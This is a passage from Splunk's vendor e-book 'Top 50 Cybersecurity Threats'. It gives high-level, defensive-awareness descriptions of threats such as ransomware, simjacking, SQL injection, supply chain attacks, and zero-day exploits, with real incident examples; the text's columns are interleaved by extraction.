posted about the attack on its Telegram channel, even going so far as to post screenshots showing it was inside Okta’s
systems. But it wasn’t after Okta, exactly — the real targets were Okta’s thousands of customers. A week later, the hacking
group added 15,000 followers to their Telegram channel, raising fears that more attacks are imminent.

84 Splunk | Top 50 Cybersecurity Threats

 Privileged User Compromise

What How Where

you need the attack the attack
to know: happens: comes from:
It’s widely accepted that many serious data Attackers attempt to gain access to privileged Because it provides attackers with hard
breaches can be traced back to the abuse of accounts by using social engineering to detect, wide access to all kinds of data
privileged credentials. These are accounts techniques, sending spear-phishing messages, privilege, user compromise is widely appealing
with elevated privileges, such as users with using malware, or “pass the hash” attacks. and commonly used in cyberattacks of
domain administrator rights or root privileges. Organizations have opened their networks various kinds, whether nation-state cyber
Attackers are increasingly using privileged to cope with an increasingly mobile, remote espionage motivated by political ideology
user credentials to access an organization’s workforce, and enable a complex web of or sophisticated, financially-motivated
resources and information and exfiltrate remote access used by suppliers and service cybercrime groups like Lapsus$.
sensitive data. An attacker that gains access providers. Many of those connections,
to privileged user credentials can take control including to the cloud, are accessed through
of an organization’s infrastructure to modify powerful privileged account credentials, and
security settings, exfiltrate data, create user finding, controlling and monitoring access to
accounts and more, all the while appearing them all is challenging, giving bad actors plenty
legitimate — and therefore harder to detect. of openings.

Once armed with the credentials, attackers get

in and grab what they can, such as SSH keys,
certificates and domain administration hashes.
And it takes only one successful account hit to
cause a major data breach that can bring an
organization to its knees.

Top 50 Cybersecurity Threats | Splunk 85

 Ransomware
According to cybersecurity company Emsisoft, ransomware attacks affected at
least 948 government agencies, educational establishments and healthcare providers
in the United States in 2019, at a potential cost exceeding $7.5 billion.
In the medical sector, the potential effects of these kinds of attacks include patients being redirected to other hospitals,
medical records being made inaccessible (or permanently lost) and emergency dispatch centers relying on printed
maps and paper logs to keep track of emergency responders in the field. In government, local 911 services can be
disrupted. And according to Manhattan D.A. Cyrus Vance Jr., the effect of ransomware could be as devastating and
costly as a natural disaster like Hurricane Sandy.

86 Splunk | Top 50 Cybersecurity Threats

 Ransomware

What How Where

you need the attack the attack
to know: happens: comes from:
Ransomware is an attack where an infected Attackers can deploy ransomware to Ransomware has typically been the work of
host encrypts a victim’s data, holding businesses and individuals through spear advanced cybercriminal groups — who remain
it hostage until they pay the attacker a phishing campaigns and drive-by downloads, anonymous after extorting governments
fee. Recent ransomware attacks have as well as through traditional remote service- or major enterprises requires technological
demonstrated that hackers have begun based exploitation. Once the malware is sophistication. However, since the arrival of
threatening to leak or sell the stolen data, installed on the victim’s machine, it either cryptocurrencies, which simplify anonymous
increasing the potential damage of these prompts the user with a pop-up or directs transactions, the general population is at
kinds of attacks by orders of magnitude. them to a website, where they’re informed that greater risk of ransomware attack.
their files are encrypted and can be released if
There are countless types of ransomware,
they pay the ransom.
but certain groups are especially nefarious.
One well-known gang, Blackmatter, has
targeted a number of organizations critical
to the U.S. economy and infrastructure,
including the food and agriculture industry.
Ryuk is another type of ransomware to
watch out for. As of 2019, Ryuk had the
highest ransom on record at $12.5 million.

Top 50 Cybersecurity Threats | Splunk 87

 Ransomware-
as-a-Service
Ransomware-as-a-Service (RaaS) is created for extortion over stolen or encrypted data, known as ransomware. The
author of the ransomware makes the software available to customers called affiliates, who use the software to hold
people’s data hostage with little technical skill. WannaCry had one of the largest RaaS attack vectors to date, with
upwards of 400,000 computers infected across 150 countries. WannaCry infiltrated networks using the EternalBlue
vulnerability in Microsoft’s implementation of the Server Message Block (SMB) protocol. A cyberattack exploit originally
developed by the U.S. National Security Agency (NSA), they did not alert Microsoft about the vulnerabilities, and held on
to it for more than five years before the breach forced the agency to come clean about the issue.

88 Splunk | Top 50 Cybersecurity Threats

 Ransomware-as-a-service

What How Where

you need the attack the attack
to know: happens: comes from:
RaaS is a business model between Ransomware is an ever-present risk to Because RaaS kits are relatively easy to use
ransomware operators and affiliates in which enterprises, wherein an infected host and very easy to find on the dark web, where
affiliates pay to launch ransomware attacks encrypts business-critical data, holding it they are widely advertised, this attack could
developed by operators. RaaS kits allow hostage until the victim pays the attacker a come from any beginning hacker with the
affiliates lacking the skill or time to develop ransom. Attackers can deploy ransomware to money to buy a kit.
their own ransomware variant to be up and enterprises through spearphishing campaigns
running quickly and affordably. A RaaS kit may and drive-by downloads, as well as through
include 24/7 support, bundled offers, user traditional remote service-based exploitation.
reviews, forums and other features identical to
those offered by legitimate SaaS providers.

Top 50 Cybersecurity Threats | Splunk 89

 Router and
Infrastructure
Security
Cisco was the victim of a router and infrastructure attack in which
a router “implant,” dubbed SYNful Knock, was reportedly found in 14
routers in four different countries. SYNful Knock is a type of persistent malware that allows an attacker to gain control
of an affected device and compromise its integrity with a modified Cisco IOS software image. Mandiant describes it as
having different modules enabled via the HTTP protocol and triggered by crafted TCP packets sent to the device.

90 Splunk | Top 50 Cybersecurity Threats

 Router and Infrastructure Security

What How Where

you need the attack the attack
to know: happens: comes from:
Router implants have been rare, and are largely Networking devices, such as routers and Advanced threats actors have shown a
believed to be theoretical in nature and use. switches, are often overlooked as resources proclivity to target these critical assets
However, recent vendor advisories indicate that attackers will leverage to subvert an as a means to siphon and redirect
that these have been seen in the wild. The enterprise. Attackers compromise network network traffic, flash backdoored
initial infection vector does not appear to devices and can then obtain direct access operating systems and implement
leverage a zero-day vulnerability. It is believed to the company’s internal infrastructure — cryptographic weakened algorithms to
that the credentials are either default or effectively increasing the attack surface and more easily decrypt network traffic.
discovered by the attacker in order to install accessing private services/data.
the backdoor. However, the router’s position in
the network makes it an ideal target for re-
entry or further infection.

Top 50 Cybersecurity Threats | Splunk 91

 Shadow IT
As software-as-a-service applications have become
increasingly quick and easy to use, employees can now download
solutions onto their workstations to help them get the job done.
However, many are using these applications with little regard for security. It’s not surprising then that a 2019 Forbes
Insights survey titled “Perception Gaps in Cyber Resilience: Where Are Your Blind Spots?” found that more than one in
five organizations experienced a cyber incident originating from an unauthorized — or “shadow” — IT resource.

92 Splunk | Top 50 Cybersecurity Threats

 Shadow IT

What How Where

you need the attack the attack
to know: happens: comes from:
In this case, the threat originates from
Shadow IT refers to IT applications and As the name suggests, the secretive nature
within an organization. Employees using
infrastructure that employees use without of shadow IT is due to employees sharing or
shadow IT apps often do so to get around a
the knowledge and/or consent of their storing data on unauthorized cloud services,
prohibitive policy or to get work done faster
organization’s IT department. These can setting the stage for a host of security and
— not necessarily to put their employers and
include hardware, software, web services, compliance risks. Breaches can occur when
coworkers at risk. However, they ultimately
cloud applications and other programs. employees upload, share or store critical or
leave the door wide open for malicious
In general, well-intentioned employees regulated data into shadow IT apps without
insiders or external hackers looking to
innocently download and use these appropriate security and data loss prevention
exploit security holes in these systems.
applications to make their work easier or more (DLP) solutions. The exposed information
efficient. It’s a phenomenon so pervasive then provides an easy target for insider
that Gartner had estimated that a third of all threats and data theft, and can also lead to
enterprise cybersecurity attacks would be costly compliance violations. In addition, the
from shadow IT resources in 2020. Because applications themselves might be fraught with
users are accessing these applications largely endpoint vulnerabilities and security gaps.
under the radar, they are often unintentionally
opening the floodgate for insider threats,
data breaches and compliance violations.

Top 50 Cybersecurity Threats | Splunk 93

 Simjacking
On August 30, 2019, Twitter CEO Jack Dorsey’s 4.2 million followers were subjected to a stream of deeply offensive messages,
courtesy of a group of hackers called the “Chuckling Squad.” The group used simjacking to gain control of Dorsey’s phone
number, then used a text-to-tweet service acquired by Twitter to post the messages. Despite the messages being visible online
for fewer than ten minutes, millions of people were exposed to the offensive tweets.

94 Splunk | Top 50 Cybersecurity Threats

 Simjacking

What How Where

you need the attack the attack
to know: happens: comes from:
SIMjacking (also known as a SIM swap A hacker calls the support line for a mobile Simjackers are typically looking to extort
scam, port-out scam, SIM splitting and SIM service provider, pretending to be the target, victims for something of great value —
swapping) is a type of account takeover that saying they’ve lost their SIM card. They like Bitcoin or other cryptocurrency wallets or
generally targets a weakness in two-factor can verify their identity because they have high-value social media accounts —
authentication and two-step verification in acquired some amount of the target’s personal or to cause harm to their reputations, as
which the second factor is a text message information (address, passwords or SSN) Chuckling Squad did with Jack Dorsey.
(SMS) or call placed to a mobile telephone. through one of the many database hacks These hackers can come from anywhere
Simply put, simjacking is when an attacker in the last decade. The service provider’s in the world, and can be members of
impersonates a target to a cellular provider employee, having no way of knowing that organized groups or solitary actors.
in order to steal their cell phone number by the person on the other end of the line is
having it transferred to a different SIM card not who they say they are, makes the switch.
(which is already in the hacker’s possession). Instantly, that phone number — the key
associated with so much of digital life —
is under the attacker’s control.

Top 50 Cybersecurity Threats | Splunk 95

 Social
Engineering
Attack
The 2002 film “Catch Me If You Can” tells the true story of (perhaps) one of the most accomplished practitioners of
social engineering of all time. In the film, Leonardo DiCaprio portrayed a man named Frank W. Abagnale, Jr., who executed
various high-profile cons, committed bank fraud and masqueraded in a variety of personas, including as a physician and
pilot. Abagnale’s success depended on his ability to convince his victims that his forgeries, whether they were checks,
diplomas or identities, were genuine. Abagnale was an active con man in the ‘60s and ‘70s, but the practice of social
engineering has continued to develop and remains a powerful tool for hackers and fraudsters to gain access to closed
systems around the world.

96 Splunk | Top 50 Cybersecurity Threats

 Social Engineering Attack

What How Where

you need the attack the attack
to know: happens: comes from:
Social engineering is the term used for a broad Social engineering attacks come in many Social engineering can take many forms and
range of malicious activities accomplished different forms and can be performed come from many sources and motivations.
through psychological manipulation to trick anywhere where human interaction is involved. Most commonly, it comes in the form
users into making security mistakes or giving The following are five common forms of digital of phishing emails. Other forms include
away sensitive information. What makes social social engineering assaults. A perpetrator first pretexting, where the attacker creates a
engineering especially dangerous is that it investigates the intended victim to gather the good pretext to steal important data; baiting
relies on human error, rather than vulnerabilities necessary background information — such and quid pro quo, in which the attacker
in software and operating systems. Mistakes as potential points of entry and weak security offers the victim something desirable in
made by legitimate users are much less protocols — needed to proceed with the exchange for providing login credentials;
predictable, making them harder to identify attack. Then, the attacker gains the victim’s and tailgating or piggybacking, in which an
and thwart than a malware-based intrusion. trust and provides stimuli for subsequent attacker gains access to a restricted area
actions that break security practices, such of a business by following an authenticated
as revealing sensitive information or granting employee through secure doors.
access to critical resources.

Top 50 Cybersecurity Threats | Splunk 97

 Spyware
It’s no secret that spyware attacks continue to occur with alarming
frequency. But if you’re a high-profile figure, you’re likely a bigger target.
In May of 2021, officials announced that bad actors had targeted the
cellphones of Spanish Prime Minister Pedro Sánchez and Defense Minister
Margarita Robles in several attacks using the Pegasus spyware, resulting
in significant data theft from both devices while wreaking havoc on Spain’s
administrators and government systems.

98 Splunk | Top 50 Cybersecurity Threats

 Spyware

What How Where

you need the attack the attack
to know: happens: comes from:
Spyware is a type of malware that aims Spyware can install itself on a victim’s device Thanks to crimeware kits that are now
to gather personal or organizational data, through various means, but will commonly get readily available, this type of attack can
track or sell a victim’s web activity (e.g., a foothold in a system by duping the target come from anyone and anywhere. But
searches, history and downloads), capture or exploiting existing vulnerabilities. This more often than not, they’ll originate from
bank account information and even steal a can happen when a user carelessly accepts nefarious organizations looking to sell a
target’s identity. Multiple types of spyware a random prompt or pop-up, downloads victim’s information to a third-party.
exist, and each one employs a unique tactic software or upgrades from an unreliable
to track the victim. Ultimately, spyware can source, opens email attachments from
take over a device, exfiltrating data or sending unknown senders, or pirates movies and music.
personal information to another unknown
entity without prior knowledge or consent.

Top 50 Cybersecurity Threats | Splunk 99

 SQL
Injection
Structured Query Language, or SQL (sometimes pronounced “sequel”), is the standard
programming language used to communicate with relational databases — systems that
support every data-driven website and application on the internet. An attacker can take
advantage of this (very common) system by entering a specific SQL query into the form
(injecting it into the database), at which point the hacker can access the database, network and servers. And SQL injection
attacks continue to be a popular attack method. As recently as August of 2020, the Freepik Company disclosed a data
breach impacting the logins of more than eight million users resulting from an SQL injection in a global database of
customizable icons, which allowed the hackers to access and ultimately steal user login and personal information.

100 Splunk | Top 50 Cybersecurity Threats

 SQL Injection

What How Where

you need the attack the attack
to know: happens: comes from:
Because so much of the internet is built on
SQL injection is a type of injection attack used A SQL injection attack consists of insertion or
relational databases, SQL injection attacks are
to manipulate or destroy databases using “injection” of a SQL query via the input data
exceedingly common. Searching the Common
malicious SQL statements. SQL statements from the client to the application.
Vulnerabilities and Exposures database for
control the database of your web application A successful SQL injection exploit can read
“injection” returns 15,000 results.
and can be used to bypass security measures sensitive data from the database, modify
if user inputs are not properly sanitized. database data, execute administration
operations on the database, recover the
content of a given file present on the
DBMS file system and in some cases issue
commands to the operating system.

Top 50 Cybersecurity Threats | Splunk 101

 Supply
Chain Attack
The SolarWinds attacks, which some experts have called the worst series of cybersecurity attacks
in history, are a prime example of the damage a supply chain attack can inflict. In 2020, sophisticated
attackers believed to have been directed by the Russian intelligence service, compromised SolarWinds
software. They embedded it with malware that was then deployed through a product update, giving
them backdoor access to all of SolarWinds Orion Platform customers’ networks. Up to 18,000 customers
installed updates that left them vulnerable to hackers, including Fortune 500 companies and multiple
agencies in the U.S. government. As Tim Brown, vice president of security at SolarWinds, said recently,
“it’s really your worst nightmare.”

102 Splunk | Top 50 Cybersecurity Threats

 Supply Chain Attack

What How Where

you need the attack the attack
to know: happens: comes from:
A supply chain attack is a powerful cyberattack A supply chain attack uses legitimate, trusted Supply chain attacks are large-scale,
that can breach even the most sophisticated processes to gain full access to organizations’ sophisticated attacks perpetrated by
security defenses through legitimate third- data by targeting the vendor’s software source sophisticated threat actors, often nation-
party vendors. Because vendors need access code, updates or build processes. They are state sponsored and ideologically motivated,
to sensitive data in order to integrate with difficult to detect because they happen at an though financial gain is also a big motivation.
their customers’ internal systems, when they offset to the attack surface. Compromised
are compromised in a cyberattack, often vendors then unwittingly transmit malware
their customers’ data is too. And because to their customer network. Victims can be
vendors store sensitive data for numerous breached through third-party software
customers, a single supply chain attack gives updates, application installers and through
hackers access to the sensitive data of many malware on connected devices. One software
organizations, across many industries. The update can infect thousands of organizations,
severity of supply chain attacks cannot be with minimal effort from the hacker, who
overstated. And the recent spate of these now has “legitimate” access to move laterally
attacks suggests this method is now the state across thousands of organizations.
actors’ attack du jour.

Top 50 Cybersecurity Threats | Splunk 103

 Suspicious Cloud
Authentication
Activities
Now more than ever, identity access management (IAM) has become a critical part of cloud security. In 2022 alone,
84% of organizations fell victim to identity-related breaches, with 96% reporting that the breach could have been avoided or
minimized by implementing identity-centric security.
Without the correct technologies and policies in place (e.g. zero trust and vendor management), identifying anomalous
behavior via authentication and authorization can be incredibly tricky. As a result, these attacks often go undetected, as
the authentication performed by a bad actor can look the same as a legitimate user, depending on how expansive the IAM
framework in place is (let alone if it even exists).
104 Splunk | Top 50 Cybersecurity Threats
 Suspicious Cloud Authentication Activities

What How Where

you need the attack the attack
to know: happens: comes from:
Organizations need to move away from The threat or attacker can easily penetrate Between the growing number of phishing
network security in order to better protect the network/breach the perimeter when attacks, increasing number of user identities
and authenticate user identities. Up until there’s a distinct lack of or a weak IAM and the continued growth of cloud adoption,
recently, however, this was much easier said framework, and when an organization is still this type of attack can come from anywhere,
than done. Certain technologies simply lacked relying on network/endpoint security. In including third-party vendors, employees,
the necessary integration capabilities, limiting both instances, because the identity access remote workers and contractors.
an organization’s ability to centrally monitor controls are so lax, the attacker can easily log
the overall security of their resources. in with the stolen credentials without being
detected, and then move laterally across the
Now there are countless technologies
network, as well as any connected systems,
available that revolve around access control,
compromising assets and causing irrevocable
like multifactor authentication (MFA). To
damage — ultimately giving them free reign.
avoid illegitimate authentication on cloud
applications, no user or device — whether
internal or external to the organization —
should be implicitly trusted, and access
to all resources should be explicitly and
continuously authenticated and authorized.

Top 50 Cybersecurity Threats | Splunk 105

 Suspicious Cloud
Storage Activities
According to the 2022 Verizon Data Breach Investigations Report (DBIR), a staggering 82% of breaches involve a “human
element,” with “miscellaneous errors” on the rise due to misconfigured cloud storage. The Sensitive Data in the Cloud report
also found that the majority of security and IT professionals (67%) are storing sensitive data in public cloud environments,
with a third of respondents saying that they weren’t confident — or only slightly confident — about their ability to protect
sensitive data in the cloud.
This type of technical and professional oversight — whether it involves a misconfigured database or security teams lacking
the necessary know-how — is exactly why cloud accounts have become a prime target in this era of remote work.

106 Splunk | Top 50 Cybersecurity Threats

 Suspicious Cloud Storage Activities

What How Where

you need the attack the attack
to know: happens: comes from:
Now that data is widely (and all too often, An attack on cloud storage happens when One example of how this can happen is if a
haphazardly) dispersed across the cloud, a bad actor gets a foothold within the developer runs an outdated instance of a cloud
attackers have ample opportunity to find organization’s cloud infrastructure due to function or application. This could contain
and exploit both known and unknown incorrect, lax or nonexistent security settings. known vulnerabilities that were eventually
vulnerabilities. This is especially true as Once inside, they’ll start disabling certain patched in a later version. But since an older
organizations hurriedly migrate to the cloud, controls, like access monitoring. They may program is running, attackers can use this
potentially compromising or misconfiguring create new accounts for continued access, as an entry point before they move laterally
certain security controls. while executing commands that aren’t typical across the cloud environment.
for the type of user or system in question.
To complicate matters further, assets and
They could also change the policies of certain
applications need to be secured per the
storage buckets, so that an organization’s files
shared responsibility model, where cloud
are accessible to the public, leading to data
service providers (CSPs) will cover certain
exfiltration. Fortunately, these are all notable
elements, processes and functions, but then
events, and will be easy to track and identify in
the customer is responsible for securing its
the CSP’s audit logs.
proprietary data, code and any other assets
of note, per the cloud security alliance (CSA).
But when that responsibility is shirked, hackers
inevitably abound.

Top 50 Cybersecurity Threats | Splunk 107

 Suspicious
Okta Activity
Okta is often the gateway to enterprise applications and accounts — a fact
not lost on hackers. If exploited, the SSO flaw allows hackers to abuse
credentials of existing accounts for unauthorized access, persistence, privilege escalation and defense evasion. Once
credentials are compromised, attackers can then bypass access controls to gain entrance to VPNs, Outlook Web Access and
remote desktop. Adversaries can also use compromised credentials to elevate their privileges to certain systems or gain entry
to restricted areas of the network, while also using malware to steal information and/or obfuscate their presence. In one attack
scenario, hackers can take over inactive accounts of employees who have left the organization and use their credentials to gain
access to critical systems for data and identify theft activities.

108 Splunk | Top 50 Cybersecurity Threats

 Suspicious Okta Activity

What How Where

you need to the attack the attack
know: happens: comes from:
Okta is the leading single sign on provider, Once exploited, this vulnerability enables a These attacks can essentially come from
allowing users to authenticate once to Okta, credential stuffing attack, in which the bad anywhere. While it is possible that they
and from there access a variety of web- actor acquires usernames and passwords can be traced to sophisticated cybercrime
based applications. These applications are from a variety of sources such as breached networks, they can also be executed by less
assigned to users and allow administrators to websites, phishing attacks and password sophisticated, individual, remote hackers with
centrally manage which users are allowed to dump sites. By conducting brute force attacks access to automated tools that can conduct a
access which applications. Okta also provides with the help of automated tools, the adversary copious number of brute force attacks at once.
centralized logging to help understand how the tests those credentials at scale against a
applications are used and by whom. plethora of websites to see if any logins are
successful and gain access to the site. From
While SSO is a major convenience for users, it
there, attackers have the ability to launch
also provides attackers with an opportunity. If
any number of attacks, including launching
the attacker can gain access to Okta, they can
phishing or spam campaigns, accessing PII
access a variety of applications
and other sensitive information, and financially
draining stolen accounts.

Password spraying attacks, which are

essentially brute force attacks, feed numerous
usernames into an automated program that
attempts to guess associated passwords.
As the name implies, it relies on a “spray”
technique in the hopes that one of the
username/password combinations is correct.
And it only takes one.
Top 50 Cybersecurity Threats | Splunk 109
 Suspicious
Zoom Child
Processes
Video-conferencing giant Zoom has emerged as the top enterprise video
communications platform over the last several years. Its usage has increased
dramatically with an upsurge of remote workers, attributed largely to shelter-in-place mandates following the COVID-19
pandemic. However, as Zoom’s popularity soared, flaws in both Windows and macOS systems have correspondingly
received increased scrutiny by bad actors, who have increasingly relied on this attack vector to gain unauthorized
access and escalate privileges onto targeted systems — including exploiting a local library validation function in
Zoom to completely hijack an unsuspecting user’s webcam and microphone. Plausible attack scenarios could mean
that attackers use their ill-gotten privileges to spy on targeted users, either in their personal lives or during important
meetings where sensitive information is being shared.

110 Splunk | Top 50 Cybersecurity Threats

 Suspicious Zoom Child Processes

What How Where

you need the attack the attack
to know: happens: comes from:
Essentially, these local privilege escalation One way this attack can happen is through the What makes this particular vulnerability unique
flaws take advantage of Zoom’s software Zoom installer designed to install the Zoom is that an attacker needs physical access
architecture designs. These exploits can MacOS app without any user interaction. In to a victim’s computer in order to exploit its
be launched by a local attacker, in which this scenario, a local adversary with low-level multiple flaws. So this attack either comes
the adversary is someone who already has user privileges can inject the Zoom installer from the inside, or from hackers who have
physical control of a vulnerable computer. with malware to obtain highest, root-level gained access to a lost or stolen laptop or
Once the bugs are exploited, attackers can privileges that allow them to access the computer system. Another attack scenario
gain and sustain persistent access to various underlying Mac operating system, making includes a post-malware infection that could
functions of a victim’s computer, which allows it easier to run malware or spyware without be perpetrated by a remote adversary, but
them to install ransomware, Trojans, spyware the consent or knowledge of the user. with pre-existing access to the targeted
and numerous other types of malicious code system, likely via a prior malware exploit.
Another bug exploits a flaw in zoom’s local
into targeted systems for nefarious purposes.
library validation function. An attacker can
load a malicious third-party library into
Zoom’s process/address space, which
automatically inherits all Zoom’s access
rights, and gain control over camera
and microphone permissions without
the user’s knowledge or consent.

Top 50 Cybersecurity Threats | Splunk 111

 System
Misconfiguration
A little mistake can have drastic consequences. Nissan North America found that out after the source code of mobile
apps and internal tools was leaked online due to a system misconfiguration. The mishap was sourced to a Git server
that was left exposed on the internet with a default username and password combo of an admin, who thus learned
of the leak from an anonymous source. Among other things, the leak contained source code data from Nissan NA
Mobile apps, client acquisition and retention tools, market research tools and data, the vehicle logistics portal and
vehicle connected services.

112 Splunk | Top 50 Cybersecurity Threats

 System Misconfiguration

What How Where

you need the attack the attack
to know: happens: comes from:
Security misconfiguration is a widespread This type of attack usually happens because Misconfiguration isn’t considered a
problem that can put organizations at of missing patches, use of default accounts, malicious act in and of itself, but instead is
risk thanks to incorrectly configured unnecessary services, insecure default mostly due to being a result of human error.
security controls (or lack thereof). This configuration and poor documentation. This However, attackers may know where to look
can happen at almost any level of the could be attributed to everything from a if they suspect a lax level of configuration
IT and security stack, ranging from the failure to set a security header on a web across a certain organization’s IT stack.
company’s wireless network, to web and server, to forgetting to disable administrative
server applications, to custom code. access for certain levels of employees. This
attack can also happen when hackers take
root in legacy applications with inherent
misconfigurations due to a lack of updates.

Top 50 Cybersecurity Threats | Splunk 113

 www.wkiped

Typosquatting
Noblox.js is a wrapper for the Roblox API, a function widely used by many gamers to automate interactions with the
popular Roblox gaming platform. The software also appears to be attracting a new crowd. In 2021, hackers launched
typosquatting attacks via the noblox.js package by uploading confusingly similar packages laden with ransomware to a
registry for open source JavaScript libraries, and then distributing the infected files via a chat service. However, since
September of 2021, gamer Josh Muir along with several others have actively been cracking down on the attackers,
attempting to prevent the proliferation of ransomware through the noblox.js package and other code libraries, and
thwart further attacks on the gaming community.

114 Splunk | Top 50 Cybersecurity Threats

 www.wkiped

Typosquatting

What How Where

you need the attack the attack
to know: happens: comes from:
Typosquatting is a phishing attack where This is not a sophisticated attack. It can be as The origins of this attack are not as
attackers take advantage of commonly simple as a 14-year-old registering a domain and important as the target. This attack is
misspelled domain names. Often times, the then installing malicious code on said domain. usually aimed at unsophisticated internet
guilty party isn’t actually looking to carry The malicious form of this attack usually involves users who won’t notice that the URL of their
out an attack, but instead is holding out a hacker using faux domains to mislead users favorite domain is a letter or two off. And
hope that a company, brand or person will into interacting with malicious infrastructure. because this attack is so simple (it can be
buy the domain off them. But in other cases, as easy as registering a domain name), it
Even for users familiar with these risks, human
thieves create malicious domains that closely can originate from almost anywhere.
error is a fact of life, and most adversaries
resemble those of legitimate brands.
are all too aware of this reality and will take
advantage of it whenever possible — like
phishing with look-alike addresses, embedding
fake command-and-control domains in
malware, and hosting malicious content on
domains that closely mimic corporate servers.

Top 50 Cybersecurity Threats | Splunk 115

 Watering
Hole Attack
In what became a classic watering hole attack, a Florida water and wastewater treatment facility contractor inadvertently
hosted malicious code on its website, leading to the reported Oldsmar water plant hack in 2021. The cybercriminals behind
the attack seemed to have a distinct audience in mind — the malicious code found on the contractor’s site also appeared to
target other Florida water utilities, and perhaps not surprisingly, was visited by a browser sourced to the city of Oldsmar on the
same day of the hack. While the website didn’t launch exploit code, it instead injected malware that functioned as a browser
enumeration and fingerprinting script designed to glean information from site visitors, including operating system, browser type,
time zone and presence of camera and microphone, which it then sent to a remote database hosted on a Heroku app site that
also stored the script.

116 Splunk | Top 50 Cybersecurity Threats

 Watering Hole Attack

What How Where

you need the attack the attack
to know: happens: comes from:
Like a literal watering hole, a watering hole The attackers will first profile their target to While they come from all over, many of the
attack is one in which the user’s computer is determine the websites they frequently visit, cybercriminals behind this attack originate
compromised by visiting an infected website and from there, will look for vulnerabilities. where organized threat groups flourish, such
with malware designed to infiltrate their By exploiting identified flaws, the attacker as Russia, Eastern Europe and China. In 2018,
network and steal data or financial assets. compromises these websites and then a country-level watering hole attack was
The specific technique is essentially a zero- waits, knowing it’s only a matter of time sourced to the Chinese threat group known as
day attack — the goal being to infect the before the user in question visits. The “LuckyMouse” (aka Iron Tiger, “EmissaryPanda”,
computer system to gain access to a network compromised website will, in turn, infect “APT 27” and “Threat Group 3390”), known
for financial gain or proprietary information. their network, allowing attackers to for targeting government, energy and
gain entry into their entire system and manufacturing sectors with numerous types of
then move laterally to other systems. attacks, including watering hole assaults.

Top 50 Cybersecurity Threats | Splunk 117

 Web
Session
Cookie
Theft
Almost every web application we use, from social media and streaming platforms to cloud services and financial
applications, runs on authentication cookies. Though cookies make our experience on the web much more convenient, they
also create a vulnerability that can be abused to great effect. In late 2019, a group of loosely connected hackers made a
name for themselves by executing cookie theft malware to hijack various YouTube channels, then lure unsuspecting owners
with bogus offers to broadcast cryptocurrency scams or sell the accounts to the highest bidder.

118 Splunk | Top 50 Cybersecurity Threats

 Web Session Cookie Theft

What How Where

you need the attack the attack
to know: happens: comes from:
When an attacker successfully steals a session After a user accesses a service and validates Cookie theft is commonly accomplished
cookie, they can perform any actions the their identity, a cookie is stored on their through malware that copies the victim’s
original user is authorized to take. A danger for machine for an extended period of time cookies and sends them directly to the
organizations is that cookies can be used to so that they don’t have to log in over and attacker. The malware can land on the victim’s
identify authenticated users in single sign-on over. Malicious actors can steal web session machine in any number of ways covered in this
systems, potentially giving the attacker access cookies through malware, then import the book, like phishing, macro viruses, cross-site
to all of the web applications the victim can cookie into a browser they control, allowing scripting and more. Many hackers engaging
use, like financial systems, customer records or them to use the site or application as the in cookie theft belong to larger networks
line-of-business systems potentially containing user for as long as the session cookie is based in Russia and China. The actors behind
confidential intellectual property. active. Once logged into the site, an adversary the YouTube attack, for example, were found
can access sensitive information, read to have been part of a group of hackers
email or perform actions that the victim’s connected via a Russian-speaking forum.
account has permissions to perform.

Top 50 Cybersecurity Threats | Splunk 119

 Wire
Attack
While the SWIFT network has experienced fewer attacks since its infamous 2016
bank heist, cybercriminals are readily using wire transfers in new and creative ways
to launch malicious, if not lucrative and creative cyber assaults. In one high-profile example
in 2018, Frank Krasovec, an owner of Domino’s Pizza franchises in China, lost $450,000 when
a fraudster intercepted his email and convinced his assistant to wire money to Hong Kong on two
occasions. More recently in 2020, attackers targeted a bank manager in Hong Kong with a call that impersonated the voice of
a director he knew via AI voice cloning technology. The cybercriminal impersonating the executive claimed his company was
making an acquisition and requested that $35 million in funds be wired electronically to another account. Usually initiated with
a phishing attack or malware, wire transfer attacks provide the vehicle for transferring copious sums of money quickly.

120 Splunk | Top 50 Cybersecurity Threats

 Wire Attack

What How Where

you need the attack the attack
to know: happens: comes from:
Wire attacks are sophisticated schemes that In one attack scenario, cybercriminals use Highly organized international and nation-
send fraudulent high-value payments through sophisticated malware to bypass local state cybercrime groups, such as APT 38 and
international wire transfer networks. Often security systems. From there, they gain Lazarus Group, have historically been behind
going beyond ordinary wire fraud, attackers access to a messaging network and send wire attacks. These groups have the necessary
can target banks in emerging markets with fraudulent messages to initiate cash transfers infrastructure and resources to successfully
limited cybersecurity infrastructure or from accounts at larger banks. In another carry out complex and multi-faceted assaults.
operational controls or lure high-profile targets attack scenario, the bad actors use targeted While it’s unclear who exactly is behind these
with sophisticated and believable phishing spear phishing campaigns that appear to be groups, some reports have indicated that they
scams. These cybercrime syndicates are after authentic in order to convince stakeholders to might have ties to North Korea. But hacking
one thing: money. And lots of it. transfer large sums of money to their coffers. groups from China and Nigeria have also been
found to be at the source of elaborate wire
transfer attacks. A note of caution: High-value
wire attacks at institutions with more robust
systems likely involve the use of insiders to
gain access to systems.

Top 50 Cybersecurity Threats | Splunk 121

 Zero-Day
Exploit
It’s hardly surprising that the number of zero day flaws continues on an upward trajectory. But 2021 blew all other years
out of the water as malicious actors exploited a total of 58 new zero day threats, compared to 25 flaws in 2020 and 21
vulnerabilities in 2019. And no doubt the stakes are getting higher as critical systems become more connected. In recent
years, hackers have used zero day attack threats to compromise Microsoft servers and install advanced spyware on
smartphones for espionage activities targeting journalists, politicians and human rights activists. In August 2021, for
example, a zero-day vulnerability known as “PwnedPiper” was found in the pneumatic tube systems used by hospitals to
transport bloodwork, test samples, and medications, which allowed attackers to exploit flaws in the control panel software,
while opening the door for unauthorized and unencrypted firmware updates.

122 Splunk | Top 50 Cybersecurity Threats

 Zero-Day Exploit

What How Where

you need the attack the attack
to know: happens: comes from:
A zero-day vulnerability, at its core, is a flaw. A zero-day attack happens once the The prevalence of technology has led
It is a weakness within a piece of software vulnerability is exploited. The nature of the to explosive growth in zero-day attacks.
or a computer network that hackers take vulnerability will affect how the attack is While these attacks can ostensibly be
advantage of soon (or immediately) after it implemented, but zero-day attacks follow launched from anywhere, they often are
becomes available for general use — the term a pattern. First, the hacker (or groups of proliferated via nation-states or regions with
“zero” refers to the same-day window in which hackers working together) scan the code extensive cyber underworld networks and
these vulnerabilities are abused. base for vulnerabilities. Once they find the infrastructure. Recent reports have cited
flaw, they create code that exploits the that the bulk of zero day threats in 2021
vulnerability. They infiltrate the system (using were sourced to hacking groups in China.
one or more of the methods described
in this book) and infect it with their
malicious code, then launch the exploit.

Top 50 Cybersecurity Threats | Splunk 123

Learn More.
Discover how your organization can thwart countless threats and
